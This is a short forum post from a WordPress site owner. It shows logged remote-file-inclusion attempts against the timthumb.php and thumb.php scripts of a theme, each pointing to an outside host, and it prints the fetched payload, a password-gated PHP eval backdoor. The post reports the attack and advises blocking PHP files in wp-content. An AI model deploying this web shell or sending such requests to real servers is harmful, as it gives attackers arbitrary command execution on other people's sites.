Got this in my "hack prevention" scripts that I have running on the site
Remote Address:[removed]
Remote Port:47762
Request Method:GET
Referer:
Query String:
Request URI:/home/wp-content/themes/mystique/thumb.php?src=http://blogger.com.bloggera.net/images.php
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62
And also
Remote Address:[removed]
Remote Port:47764
Request Method:GET
Referer:
Query String:
Request URI:/home/wp-content/themes/mystique/timthumb.php?src=http://blogger.com.bloggera.net/images.php
User Agent:Opera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.62
The content of the File "images.php" is
::::BINARY CODE PAYLOAD::::
<?php
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
?>
Looks like they are trying to gain CMD on my Apache server
If you guys are getting the same, I suggest you block PHP files in your wp-content folder
The blog I need help with is pinchii.com.